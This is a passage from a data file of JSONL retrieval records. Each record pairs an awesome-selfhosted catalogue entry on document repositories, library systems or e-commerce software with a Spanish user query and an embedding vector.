-0.07825, -0.14719, 0.05013, -0.0285, 0.10698, -0.01236, 0.19078, -0.11621, 0.09815, 0.00165, -0.06912, -0.01884, -0.03318, -0.01564, -0.07592, -0.08276, 0.07967, -0.10276, -0.05785, 0.05597, -0.00126, -0.05119, 0.09292, -0.06006, 0.03218, -0.0342, 0.05717, 0.19244, 0.09385, 0.0304, 0.07453, -0.028, -0.04113, 0.08038, -0.06354, -0.03062, 0.08562, -0.03662, 0.0469, 0.04673, -0.05808, -0.12647, -0.09969, 0.00746, -0.01898, 0.01793, 0.06158, -0.17172, 0.01413, -0.09887, -0.15303, 0.07106, 0.01972, -0.1397, 0.14105, -0.04146, -0.04746, -0.02187, -0.0398, -0.00032, -0.07732, 0.01446, -0.04762, -0.05204, -0.08562, 0.09082, -0.07512, -0.05212, 0.0134, 0.04348, 0.09107, -0.05041, -0.05875, 0.01549, -0.07436, -0.07626, 0.03773, -0.12108, 0.07095, 0.05078, 0.05703, 0.05717, -0.0779, 0.09911, -0.01729, 0.00847, 0.04072, -0.02607, 0.06623, 0.02761, 0.1393, 0.07977, -0.04981, 0.03008, 0.01816, -0.02803, -0.00283, -0.00223, -0.02414, 0.01051, 0.08213, 0.03315, -0.01445, 0.0008, -0.08453, -0.10641, -0.04611, 0.02266, 0.07101, 0.04813, -0.14986, -0.06896, 0.01775, 0.01606, 0.0653, 0.00684, 0.09716, 0.01815, -0.00921, -0.03286, 0.06988, -0.01863, -0.09705, -0.06353, -0.04389, -0.03341, 0.05971, -0.04532, -0.01515, -0.02736, 0.05593, 0.01335, 0.00457, 0.05574, 0.06562, -0.05468, 0.06051, -0.05468, -0.03026, 0.01839, -0.03955, -0.03648, -0.03717, 0.07416, -0.09979, 0.02607, -0.03653, -0.06146, -0.02328, 0.07298, 0.05009, 0.01344, 0.06427, 0.03923, -0.03481, -0.01748, -0.00567, 0.00195, 0.03454, 0.00336, -0.1031, 0.05411, -0.02149, -0.07286, 0.05294, -0.04107, -0.09682, -0.01754, 0.05515, 0.02781, -0.05198, 0.00125, -0.08484, -0.02512, -0.08891, -0.04105, -0.01271, -0.05157, 0.01212, -0.01212, -0.00237, -0.01447, -0.08531, 0.0034, 0.00404, -0.00369, -0.06264, -0.02971, -0.00463, -0.08424, -0.07224, 0.01292, -0.01647, 0.03892, -0.00288, -0.05945, -0.00165, 0.08491, 0.00561, 0.05638, 0.02241, 0.01655, 0.11734, -0.00666, -0.0301, -0.0223, 0.02999, -0.10065, -0.0063, -0.02451, 0.02097, -0.03596, 0.02206, 0.00791, -0.00565, 0.01178, 0.03963, 0.03391, 0.04548, 0.0352, -0.00793, 0.02725, -0.00649, 0.02849, -0.01919, -0.01388, 0.0581, 0.01509, -0.01459, -0.05741, 0.05938, 0.09355, -0.01571, -0.06311, -0.00203, -0.02589, -0.06484, -0.02402, -0.06704, -0.03421, 0.00411, -0.01316, 0.00259, 0.00763, 0.07866, -0.05496]} -{"tipo": "pregunta", "herramienta": "Document Management - Institutional Repository and Digital Library Software", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software", "tema": "document management - institutional repository and digital library software", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software: DSpace β€” Turnkey repository application providing durable access to digital resources [BSD-3-Clause, Java]. EPrints β€” Digital document management system with a flexible metadata and workflow model primarily aimed at academic institutions [GPL-3.0, Perl]. Fedora Commons Repository β€” Robust and modular repository system for the management and dissemination of digital content especially suited for digital libraries and archives, both for access and preservation [Apache-2.0, Java]. InvenioRDM β€” Highly scalable turn-key research data management platform with a beautiful user experience [MIT, Python]. Islandora β€” Drupal module for browsing and managing Fedora-based digital repositories [GPL-3.0, PHP]. Samvera Hyrax β€” Front-end for the Samvera framework, which itself is a Ruby on Rails application for browsing and managing Fedora-based digital repositories [Apache-2.0, Ruby].", "indexar": "que programa de gestiΓ³n de repositorios digitales sirve para archivos institucionales?", "v": [0.20761, -0.07296, -0.01077, -0.18249, 0.17949, -0.1283, 0.03285, -0.12398, -0.12263, -0.02147, 0.05515, -0.1246, -0.04479, -0.16052, 0.01195, -0.05125, 0.19441, -0.10162, 0.01283, -0.09059, -0.03824, 0.05537, -0.01203, -0.03866, -0.03532, -0.08024, 0.00302, -0.03093, -0.06024, 0.01675, 0.04778, -0.02295, 0.01933, -0.11335, -0.06803, -0.03364, -0.00783, 0.11214, -0.09836, 0.04755, 0.06163, 0.05195, -0.03314, 0.10749, 0.03447, -0.06041, 0.10373, -0.04674, 0.0384, -0.00253, -0.08367, -0.06657, -0.00264, 0.11122, 0.01424, -0.10163, 0.0393, -0.14586, -0.00722, -0.02205, -0.10345, 0.0945, 0.08119, -0.00074, 0.04081, 0.03784, 0.05888, -0.02265, -0.20769, 0.09471, 0.00678, 0.10375, 0.08349, -0.00476, -0.06624, 0.00349, -0.01201, -0.0303, -0.07905, -0.0445, 0.02954, -0.05132, 0.09076, 0.08728, -0.08677, -0.08202, -0.0178, -0.01167, 0.01106, -0.06354, -0.08873, 0.0344, -0.02014, -0.07254, 0.03878, -0.02428, 0.13256, -0.02355, -0.02807, 0.04921, -0.00384, 0.02156, -0.03787, 0.04436, -0.02955, 0.11261, 0.05628, -0.04693, 0.01767, 0.02966, 0.03804, 0.04198, 0.00615, 0.03251, -0.06895, 0.12222, 0.06035, -0.0583, 0.06552, 0.00227, 0.02523, -0.01399, -0.00057, -0.01174, 0.0641, 0.02058, 0.03705, 0.01422, -0.04055, -0.0135, 0.03451, -0.03437, -0.0304, 0.02222, -0.11072, -0.02341, 0.01795, -0.00665, -0.01232, -0.05433, 0.02199, 0.05631, 0.063, -0.00118, 0.04552, -0.07318, 0.08947, -0.0177, -0.00358, 0.00898, -0.02708, -0.05688, -0.04106, 0.02215, -0.09228, 0.01192, -0.05358, -0.11724, -0.18218, 0.02502, -0.0628, -0.00082, -0.03517, 0.03184, 0.00062, -0.03624, 0.04254, 0.0913, 0.04476, 0.05157, 0.04229, 0.04262, -0.01694, -0.09996, -0.04043, -0.01328, -0.08083, -0.062, 0.10211, -0.01034, -0.09942, -0.05306, 0.06622, 0.08154, -0.02371, -0.00348, -0.02237, -0.03244, -0.01896, 0.01051, 0.01793, -0.05819, -0.07483, 0.04796, 0.09926, -0.03677, -0.06319, 0.05761, 0.00864, -0.04755, -0.04548, 0.00721, -0.03189, 0.02859, 0.00393, 0.08517, -0.01885, -0.02385, 0.03823, 0.05646, -0.04142, -0.0032, 0.04207, -0.00554, -0.06248, -0.04558, -0.02485, 0.05726, 0.00215, -0.00527, 0.03361, -0.04446, 0.04479, 0.04296, 0.04302, -0.01344, 0.01798, -0.01209, -0.04164, -0.07745, 0.00405, -0.08443, 0.00094, -0.00649, 0.01094, -0.02191, -0.00033, -0.00201, -0.07389, -0.06536, -0.05006, 0.08205, -0.02864, 0.00657, -0.01973, -0.0382, -0.05058, 0.01364, -0.01143, 0.00331, -0.00131, 0.01946, -0.01947, 0.01185, -0.01275, 0.04327]} -{"tipo": "pregunta", "herramienta": "Document Management - Institutional Repository and Digital Library Software", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software", "tema": "document management - institutional repository and digital library software", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software: DSpace β€” Turnkey repository application providing durable access to digital resources [BSD-3-Clause, Java]. EPrints β€” Digital document management system with a flexible metadata and workflow model primarily aimed at academic institutions [GPL-3.0, Perl]. Fedora Commons Repository β€” Robust and modular repository system for the management and dissemination of digital content especially suited for digital libraries and archives, both for access and preservation [Apache-2.0, Java]. InvenioRDM β€” Highly scalable turn-key research data management platform with a beautiful user experience [MIT, Python]. Islandora β€” Drupal module for browsing and managing Fedora-based digital repositories [GPL-3.0, PHP]. Samvera Hyrax β€” Front-end for the Samvera framework, which itself is a Ruby on Rails application for browsing and managing Fedora-based digital repositories [Apache-2.0, Ruby].", "indexar": "cual es una alternativa libre y duradera para crear una biblioteca digital en mi universidad?", "v": [-0.03237, -0.0661, -0.08867, -0.01039, -0.05117, 0.0029, -0.14255, -0.01087, -0.10139, -0.14049, -0.0738, -0.23753, -0.06358, -0.06205, -0.10563, -0.21423, 0.08127, -0.09394, 0.13841, -0.14611, 0.05931, 0.04928, -0.01403, -0.01, -0.03992, -0.1615, 0.02161, 0.03117, -0.01389, 0.08905, 0.07036, 0.08907, 0.04602, -0.10653, -0.01262, 0.00147, 0.10989, 0.10547, 0.03533, 0.00084, 0.01138, 0.10593, 0.04218, 0.10021, -0.00168, -0.03449, 0.06139, 0.01631, -0.05999, 0.12845, -0.07302, 0.03653, -0.0774, 0.04466, 0.07588, -0.03779, 0.08063, -0.07839, -0.01893, -0.06363, -0.11044, 0.07681, -0.02228, -0.05439, 0.09733, 0.01957, -0.06108, -0.00173, -0.17017, 0.10301, -0.00096, -0.0418, -0.00589, -0.03577, -0.17689, 0.13998, -0.07015, -0.08827, 0.02015, -0.04063, 0.03011, -0.01135, 0.05793, 0.05317, -0.06949, -0.06205, 0.06247, -0.05018, 0.03874, 0.06735, -0.07207, 0.04626, -0.10057, 0.06149, 0.09813, -0.14349, 0.03204, 0.04612, -0.05174, 0.03122, 0.0165, 0.0461, -0.03743, 0.00248, -0.04002, -0.06842, -0.11718, 0.02968, 0.0133, 0.0013, 0.05581, -0.01019, 0.0066, -0.0438, 0.00421, -4e-05, 0.1059, 0.02333, 0.04289, 0.01315, -0.02982, -0.04046, -0.03545, -0.08525, 0.04195, 0.12437, 0.1185, -0.04723, -0.02155, -0.01454, 0.07917, -0.01936, -0.10659, -0.11287, -0.06085, 0.04002, 0.00939, -0.09951, 0.01075, -0.02107, -0.00149, 0.04145, -0.07209, -0.03606, -0.0633, -0.09405, 0.00207, 0.00509, -0.05535, -0.03443, -0.11553, -0.02449, 0.00511, 0.07551, -0.07735, 0.09562, -0.00184, -0.04448, -0.07, 0.03338, 0.03304, 0.03772, 0.00913, -0.04229, -0.05976, -0.03129, 0.01219, -0.0374, 0.02683, 0.02691, -0.05141, 0.02507, -0.02679, -0.08077, 0.0503, -0.0627, 0.01144, -0.01912, 0.03344, 0.04489, -0.02648, -0.00081, -0.02101, -0.03877, -0.02896, -0.07372, 0.02006, -8e-05, -0.04182, -0.01822, 0.01542, 0.0357, -0.04416, 0.03221, 0.0505, -0.00438, -0.00265, -0.0233, 0.0463, -0.01066, 0.01582, 0.02448, -0.02045, 0.00561, 0.00709, -0.01562, -0.05353, 0.03484, -0.04588, 0.04205, -0.0027, 0.02371, 0.0395, -0.01069, -0.05152, -0.05842, -0.0054, 0.02853, -0.01148, -0.08222, 0.04725, -0.0109, 0.02837, 0.05984, 0.06143, 0.01757, 0.02346, 0.01837, -0.05002, -0.01976, 0.01385, -0.05346, 0.01971, 0.03485, 0.00676, -0.00015, 0.01639, 0.04982, -0.05305, -0.00899, 0.02531, 0.04454, -0.04015, 0.01923, 0.00202, 0.00781, -0.09512, 0.05104, -0.09207, -0.05202, -0.03387, 0.00907, 0.01452, 0.01678, 0.01499, 0.03592]} -{"tipo": "pregunta", "herramienta": "Document Management - Institutional Repository and Digital Library Software", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software", "tema": "document management - institutional repository and digital library software", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Institutional Repository and Digital Library Software: DSpace β€” Turnkey repository application providing durable access to digital resources [BSD-3-Clause, Java]. EPrints β€” Digital document management system with a flexible metadata and workflow model primarily aimed at academic institutions [GPL-3.0, Perl]. Fedora Commons Repository β€” Robust and modular repository system for the management and dissemination of digital content especially suited for digital libraries and archives, both for access and preservation [Apache-2.0, Java]. InvenioRDM β€” Highly scalable turn-key research data management platform with a beautiful user experience [MIT, Python]. Islandora β€” Drupal module for browsing and managing Fedora-based digital repositories [GPL-3.0, PHP]. Samvera Hyrax β€” Front-end for the Samvera framework, which itself is a Ruby on Rails application for browsing and managing Fedora-based digital repositories [Apache-2.0, Ruby].", "indexar": "que herramienta me permite organizar y preservar contenidos digitales de forma modular?", "v": [0.13699, 0.06676, -0.14262, -0.18428, 0.05151, -0.05462, -0.05101, -0.00416, -0.17687, -0.12572, -0.02726, -0.08775, 0.04247, -0.18631, 0.04894, -0.0058, 0.17415, -0.17427, -0.08925, 0.02016, -0.0041, -0.01389, -0.09276, -0.08591, -0.01282, -0.1323, 0.08498, -0.04947, -0.13547, 0.06898, 0.03122, 0.00213, 0.00285, -0.02115, -0.07884, -0.09148, -0.02183, 0.0637, -0.12176, -0.03033, -0.10487, 0.05161, -0.02215, 0.11707, 0.01157, 0.04209, -0.05733, 0.01179, 0.01191, 0.08957, -0.01403, -0.02108, -0.06171, 0.10516, -0.01267, -0.14202, 0.13836, -0.12544, 0.08094, -0.17274, -0.04205, 0.069, 0.01838, 0.05723, 0.06027, 0.0776, -0.01255, 0.03945, -0.17147, 0.12652, -0.00764, -0.01716, 0.0805, -0.04698, 0.01382, -0.01061, -0.00211, 0.00688, -0.04617, 0.01421, 0.01705, -0.05843, -0.00076, 0.09919, -0.04633, -0.06872, -0.03702, -0.05423, -0.04894, -0.07904, -0.00073, 0.09797, 0.03991, -0.0395, -0.03644, -0.0568, 0.09629, 0.02653, -0.02706, 0.00863, 0.06244, 0.00776, -0.04806, -0.00423, -0.03947, -0.01453, -0.01828, 0.00943, 0.01826, 0.04663, -0.01955, 0.04105, 0.02794, 0.00699, 0.00513, 0.0952, 0.08558, -0.02758, 0.02004, -0.01105, 0.10053, 0.02172, -0.01517, -0.05347, 0.1199, 0.05129, -0.00605, 0.03555, -0.02947, -0.10597, -0.01726, -0.06873, -0.01388, 0.00511, -0.00555, -0.01972, -0.01565, -0.10029, 0.01504, -0.06861, -0.05067, -0.01552, -0.05416, -0.1047, 0.02465, -0.0223, 0.10278, -0.03551, -0.09312, 0.03913, -0.04107, -0.08027, -0.04966, -0.0191, -0.08531, 0.05628, -0.12002, -0.06788, -0.12397, 0.03388, -0.06932, -0.03479, 0.06074, 0.00969, -0.01713, -0.07238, 0.04186, 0.03033, 0.01374, -0.00708, 0.01563, 0.00688, 0.0745, -0.03271, -0.04913, -0.02084, -0.09386, 0.00632, 0.03762, -0.04575, -0.03798, -0.00431, 0.01967, 0.02355, -0.02013, -0.03892, 0.01049, -0.0234, -0.04623, 0.03719, 0.04974, 0.05217, -0.03363, -0.01978, 0.0887, -0.05804, -0.08898, 0.01088, 0.05256, 0.01781, -0.03948, -0.02869, -0.01106, -0.02671, 0.00813, 0.05559, -0.02514, -0.01697, -0.00783, 0.05145, 0.00765, -0.03538, 0.00099, -0.04084, -0.07306, 0.01078, -0.02923, 0.01446, -0.05072, -0.02426, 0.04176, -0.05032, 0.04053, -0.06013, 0.03138, 0.01195, 0.01717, 0.03246, -0.00827, -0.08575, 0.02114, -0.08175, -2e-05, 0.02517, -0.00783, -0.01867, 0.03228, -0.01265, -0.09158, -0.01772, -0.04202, 0.06622, 0.00014, 0.04555, -0.05358, -0.04483, -0.04903, 0.04384, -0.0501, -0.05403, 0.00118, -0.01582, 0.0321, -0.04785, -0.03348, 0.01412]} -{"tipo": "pregunta", "herramienta": "Document Management - Integrated Library Systems (ILS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Integrated Library Systems (ILS)", "tema": "document management - integrated library systems (ils)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Integrated Library Systems (ILS): Evergreen β€” Highly-scalable software for libraries that helps library patrons find library materials, and helps libraries manage, catalog, and circulate those materials [GPL-2.0, PLpgSQL]. Koha β€” Enterprise-class ILS with modules for acquisitions, circulation, cataloging, label printing, offline circulation for when Internet access is not available, and much more [GPL-3.0, Perl]. RERO ILS β€” Large-scale ILS that can be run as a service with consortial features, intended primarily for library networks. Includes most standard modules (circulation, acquisitions, cataloging,...) and a web-based public and professional interface [AGPL-3.0, Python/Docker].", "indexar": "que programa hay para gestionar materiales de biblioteca en casa?", "v": [-0.02843, 0.01763, -0.04421, -0.25451, -0.05345, -0.1082, -0.06976, 0.04326, -0.1045, -0.16188, -0.06613, -0.0416, 0.0198, -0.00078, -0.01639, -0.00783, 0.10298, -0.12281, 0.01614, -0.02009, 0.01713, 0.15962, -0.03361, 0.07964, -0.0482, -0.05337, 0.11298, -0.05095, -0.05882, 0.18459, 0.03639, -0.00673, 0.05959, -0.14639, -0.00873, 0.05808, 0.05901, -0.00854, 0.01282, -0.04073, 0.00926, 0.07722, 0.05462, 0.05616, 0.01398, -0.06509, 0.15327, -0.05649, -0.05582, 0.01392, -0.15154, -0.06586, 0.00933, 0.07497, 0.07877, -0.1073, -0.02102, -0.14477, -0.00104, -0.07439, -0.05553, 0.04405, 0.00903, -0.02596, 0.05976, 0.00135, 0.03832, 0.06051, -0.0422, 0.03482, -0.04305, -0.02487, 0.04064, 0.01301, -0.12491, 0.01702, 0.01154, -0.01898, 0.01338, -0.05746, -0.04151, -0.00797, 0.00632, 0.01511, -0.02891, -0.01762, 0.04011, -0.0805, 0.08739, -0.04139, -0.09489, 0.00281, -0.06917, -0.01325, 0.10633, -0.08729, 0.11955, 0.03945, 0.03559, 0.08619, -0.03258, -0.01169, -0.01366, 0.12329, -0.02222, 0.04321, -0.04927, -0.02888, -0.02945, -0.09809, -0.01674, 0.07181, 0.02913, -0.01528, -0.07435, 0.04396, 0.07192, -0.05765, 0.0891, 0.02442, -0.19721, -0.02446, -0.04835, -0.02909, 0.08314, -0.01272, 0.17243, 0.01032, -0.00501, 0.07517, -0.05515, -0.01518, -0.04403, 0.02175, -0.08575, -0.00038, -0.07601, -0.12184, -0.04225, -0.11998, 0.00551, 0.03697, 0.01052, 0.00095, 0.0054, -0.10186, 0.00393, 0.0515, -0.00318, 0.04266, -0.02617, -0.01588, 0.03957, 0.05161, 0.01845, 0.05642, 0.06586, 0.00653, -0.14101, -0.02208, -0.07375, 0.0231, -0.05127, -0.06106, -0.07009, 0.0351, 0.05613, 0.09087, 0.02429, 0.02257, -0.0758, 0.02906, 0.01646, 0.00537, -0.06042, -0.05275, 0.03643, -0.05934, 0.00126, 0.04295, -0.08477, 0.01837, 0.04442, -0.00791, -0.07178, -0.02344, -0.04066, 0.07024, -0.05051, -0.08299, -0.05645, -0.00068, -0.01543, 0.03981, 0.00412, -0.01599, -0.05897, 0.07081, 0.05776, -0.00377, -0.0145, 0.01464, 0.08901, 0.08785, 0.06452, 0.07156, -0.01476, 0.00791, 0.03013, 0.02801, 0.00186, 0.02615, 0.03316, 0.05116, -0.04916, -0.00756, -0.09427, 0.03775, 0.05904, 0.00095, 0.05616, -0.00404, 0.02838, 0.02313, 0.02976, -0.09371, 0.00316, -0.02771, 0.05388, 0.0123, -0.03753, -0.12766, 0.08465, 0.06159, 0.01812, -0.0506, 0.0409, 0.00352, 0.01745, -0.02003, -0.06203, 0.08253, -0.00218, 0.01893, 0.01092, 0.02009, -0.06442, 0.04948, 0.01921, 0.02164, -0.0197, -0.02204, -0.03131, 0.00047, 0.03468, -0.00183]} -{"tipo": "pregunta", "herramienta": "Document Management - Integrated Library Systems (ILS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Integrated Library Systems (ILS)", "tema": "document management - integrated library systems (ils)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Integrated Library Systems (ILS): Evergreen β€” Highly-scalable software for libraries that helps library patrons find library materials, and helps libraries manage, catalog, and circulate those materials [GPL-2.0, PLpgSQL]. Koha β€” Enterprise-class ILS with modules for acquisitions, circulation, cataloging, label printing, offline circulation for when Internet access is not available, and much more [GPL-3.0, Perl]. RERO ILS β€” Large-scale ILS that can be run as a service with consortial features, intended primarily for library networks. Includes most standard modules (circulation, acquisitions, cataloging,...) and a web-based public and professional interface [AGPL-3.0, Python/Docker].", "indexar": "con que puedo montar un sistema completo para llevar el catΓ‘logo y prΓ©stamo de libros?", "v": [0.03228, 0.13425, -0.21993, -0.21069, -0.0645, -0.07523, 0.1188, 0.04443, -0.18487, -0.13938, -0.11066, -0.05814, 0.0286, -0.08523, -0.01772, 0.0126, -0.0067, -0.11692, 0.03079, 0.00867, 0.06982, -0.12235, -0.06844, -0.06496, -0.03563, 0.09544, 0.05096, -0.07151, -0.17677, 0.09099, 0.01227, -0.01879, 0.04355, -0.09129, 0.04097, -0.13639, 0.09965, 0.03136, -0.04783, -0.00925, 0.08547, -0.04219, 0.0981, 0.01825, -0.03172, -0.04472, 0.02859, 0.02104, -0.06469, -0.056, 0.01493, -0.06483, -0.108, -0.05544, 0.05795, -0.07922, 0.04956, -0.00759, 0.01085, -0.06842, -0.00181, 0.11935, -0.05246, -0.04218, 0.09381, 0.00753, -0.13516, -0.00211, -0.19059, -0.03676, 1e-05, -0.05351, -0.02221, 0.0511, -0.06035, 0.07786, -0.03135, -0.01115, 0.10354, -0.01221, 0.09308, 0.01709, -0.01062, 0.01229, -0.02597, 0.04314, 0.0333, 0.01976, 0.10963, -0.01435, 0.04667, -0.0339, -0.05321, -0.00976, 0.03999, -0.07475, 0.00773, 0.0718, 0.06022, -0.07105, -0.06639, 0.01672, -0.03648, 0.08998, -0.09413, -0.12158, 0.01954, -0.04726, -0.01019, -0.06807, -0.06556, 0.06087, -0.0047, -0.04436, -0.02428, -0.06666, -0.01297, 0.05731, 0.01436, 0.07482, -0.08262, 0.02522, 0.00902, 0.02509, 0.08997, 0.00746, 0.05491, 0.06008, 0.01539, 0.03309, 0.04836, 0.01494, -0.11969, -0.07983, -0.01635, 0.00588, -0.02488, 0.01088, -0.02907, -0.03947, -0.01181, 0.01623, 0.00212, -0.05792, -0.02838, -0.0777, -0.00187, -0.05558, -0.0019, -0.03179, -0.0147, 0.14672, 0.03186, 0.03052, -0.01025, -0.02118, 0.07396, 0.01362, 0.01599, -0.02288, 0.08469, 0.0446, 0.00833, 0.0313, -0.08868, 0.00421, -0.01793, -0.02027, 0.05392, 0.0022, -0.045, 0.03461, 0.03621, 0.01453, 0.08966, -0.00843, 0.00177, -0.04507, 0.03931, 0.06037, -0.15776, 0.03453, -0.02281, 0.00453, -0.05179, -0.01073, 0.05378, 0.03645, 0.03226, -0.02185, 0.0356, 0.05764, -0.00525, 0.0595, 0.0309, 0.05479, -0.0499, 0.10204, 0.06663, -0.03555, -0.03441, -0.01691, -0.04017, 0.02077, 0.11496, -0.0314, -0.03126, 0.12813, 0.0185, 0.03518, 0.00673, -0.02403, 0.10209, -0.03448, -0.06313, -0.0027, -0.11869, 0.01697, -0.06299, -0.0013, 0.06201, -0.01948, 0.08593, 0.10782, -0.00104, -0.00512, -0.00018, -0.0276, 0.0469, -0.00076, -0.04197, -0.02333, -0.01388, -0.0304, 0.01042, 0.01527, 0.06893, -0.00472, -0.05395, -0.02804, -0.00524, 0.05322, -0.02609, -0.04581, -0.04999, -0.00762, -0.05837, 0.028, -0.0181, -0.04141, -0.008, 0.02855, -0.03586, -0.08103, 0.04027, -0.01804]} -{"tipo": "pregunta", "herramienta": "Document Management - Integrated Library Systems (ILS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management - Integrated Library Systems (ILS)", "tema": "document management - integrated library systems (ils)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management - Integrated Library Systems (ILS): Evergreen β€” Highly-scalable software for libraries that helps library patrons find library materials, and helps libraries manage, catalog, and circulate those materials [GPL-2.0, PLpgSQL]. Koha β€” Enterprise-class ILS with modules for acquisitions, circulation, cataloging, label printing, offline circulation for when Internet access is not available, and much more [GPL-3.0, Perl]. RERO ILS β€” Large-scale ILS that can be run as a service with consortial features, intended primarily for library networks. Includes most standard modules (circulation, acquisitions, cataloging,...) and a web-based public and professional interface [AGPL-3.0, Python/Docker].", "indexar": "cual es una alternativa libre a los sistemas comerciales de gestiΓ³n bibliotecaria?", "v": [-0.0465, -1e-05, -0.02562, -0.14245, -0.06595, -0.13282, -0.04741, -0.01461, -0.19992, -0.09897, -0.09597, -0.12064, 0.02375, 0.03512, 0.11299, -0.0503, 0.04973, -0.14473, 0.10619, -0.05273, 0.02044, 0.04627, -0.03425, 0.03351, -0.02051, -0.04766, 0.03091, -0.11176, -0.07277, 0.18609, 0.04793, -0.0185, 0.12906, -0.11231, -0.02225, 0.01857, 0.0531, 0.03865, 0.05356, -0.0987, 0.0488, -0.04359, 0.02063, 0.04361, 0.04061, -0.0723, 0.02948, -0.00278, -0.06103, -0.00112, -0.13531, -0.04122, -0.08403, 0.01059, 0.20703, -0.06881, 0.02745, -0.01855, -0.01654, -0.09798, -0.02996, 0.06384, 0.02528, -0.11106, 0.12273, -0.00133, -0.04127, -0.00754, -0.02802, 0.10316, -0.01895, -0.00176, 0.01955, 0.02263, -0.08709, 0.10296, 0.03282, 0.09237, 0.00129, 0.01568, 0.03975, -0.1154, -0.03944, 0.07777, -0.0434, -0.08364, 0.05206, -0.07569, 0.04402, 0.05325, -0.00054, -0.02477, -0.12938, -0.00488, 0.129, -0.07179, -0.04953, 0.04427, -0.01361, 0.14783, 0.02428, 0.05854, -0.10533, 0.01987, -0.02501, -0.01899, -0.02333, -0.06913, 0.05043, -0.10012, -0.00747, -0.02065, 0.04501, -0.03366, -0.04883, -0.01659, 0.07381, 0.01882, 0.01723, 0.06395, -0.15561, -0.05476, -0.02471, -0.07461, 0.07061, 0.04021, 0.1296, 0.07127, 0.01583, 0.01321, 0.04918, -0.01724, -0.07262, -0.03422, -0.09288, 0.02871, -0.01778, -0.07625, -0.00456, -0.03013, -0.04583, 0.00954, -0.01653, -0.02037, 0.01114, -0.07648, 0.06181, -0.05559, 0.0243, -0.03019, -0.04163, -0.0095, 0.01811, 0.09375, -0.03283, 0.09315, 0.05674, -0.05427, -0.07939, 0.03715, 0.03085, 0.01156, 0.01831, 0.02181, -0.09991, -0.04619, -0.01816, -0.01387, 0.0471, 0.00975, -0.03293, 0.02946, 0.01048, -0.0617, 0.04169, -0.09451, -0.04786, -0.07704, 0.11024, 0.01656, -0.08155, 0.00389, -0.05712, -0.01903, -0.08715, -0.09096, -0.04993, -0.04173, -0.00921, 0.00933, -0.01749, 0.04791, -0.08774, -0.05567, -0.01903, 0.0088, -0.03837, -0.00807, 0.00178, -0.02176, -0.04516, 0.01167, 0.01291, 0.00578, 0.00535, 0.01767, -0.02445, 0.10502, 0.02273, 0.01639, 0.00219, 0.02767, 0.0538, -0.01896, -0.08607, -0.05233, -0.01413, 0.00271, 0.01762, -0.11132, 0.05569, 0.03145, 0.08709, 0.02332, 0.0401, -0.03026, 0.01005, 0.05356, 0.0143, 0.00079, -0.03789, -0.04874, 0.05913, 0.04686, 0.029, -0.01361, 0.03687, 0.02076, 0.01048, -0.07982, 0.04054, 0.11026, -0.07243, -0.06846, -0.00744, -0.02804, -0.12004, 0.00314, -0.02907, -0.07399, -0.0393, 0.01332, -0.00622, -0.01306, 0.07939, -0.02503]} -{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Aimeos β€” E-commerce framework for building custom online shops, market places and complex B2B applications scaling to billions of items with Laravel [LGPL-3.0/MIT, PHP]. Bagisto β€” Leading Laravel open source e-commerce framework with multi-inventory sources, taxation, localization, dropshipping and more exciting features [MIT, PHP]. CoreShop β€” E-commerce plugin for Pimcore [GPL-3.0, PHP]. Drupal Commerce β€” Popular e-commerce module for Drupal CMS, with support for dozens of payment, shipping, and shopping related modules [GPL-2.0, PHP]. EverShop β€” E-commerce platform with essential commerce features. Modular architecture and fully customizable [⚠, GPL-3.0, Docker/Nodejs]. Magento Open Source β€” Leading provider of open omnichannel innovation [OSL-3.0, PHP]. MedusaJs β€” Headless commerce engine that enables developers to create amazing digital commerce experiences [MIT, Nodejs]. Microweber β€” Drag and Drop CMS and online shop [MIT, PHP]. myCart β€” Shopping cart in 1 file (with support for payment by card or cryptocurrency) [⚠, MIT, Go/Docker].", "indexar": "quΓ© software sirve para montar una tienda online compleja sin pagar licencias?", "v": [0.09987, -0.02507, -0.17965, -0.13252, -0.04827, -0.17765, -0.01953, -0.03075, -0.14927, -0.08392, 0.00929, -0.12369, 0.11915, -0.12281, 0.07919, -0.00539, 0.03419, -0.2224, 0.16996, 0.01517, 0.04436, 0.00914, -0.05501, -0.13957, -0.07453, 0.01734, 0.11445, -0.18825, -0.21564, 0.1574, 0.00119, 0.01499, 0.1136, -0.01678, -0.008, -0.0245, -4e-05, 0.01434, 0.11413, -0.03381, 0.15092, 0.02833, -0.00898, -0.02636, -0.0635, -0.04612, 0.07426, 0.04739, 0.00275, 0.03583, 0.01148, 0.03798, -0.066, -0.08939, 0.0969, -0.07588, 0.1051, 0.0225, 0.12488, -0.0105, -0.07439, 0.0299, 0.08095, 0.03406, -0.024, 0.01402, 0.06371, 0.01274, -0.0019, -0.07911, -0.09285, -0.01489, 0.03069, -0.04621, -0.09708, -0.00478, -0.05574, -0.07087, 0.035, 0.05809, 0.11401, 0.00888, -0.04944, 0.03675, -0.00233, -0.07979, 0.00335, -0.02413, 0.11406, 0.02227, -0.03052, 0.09241, -0.03768, 0.05933, 0.09865, -0.09144, 0.0781, 0.05078, 0.00415, 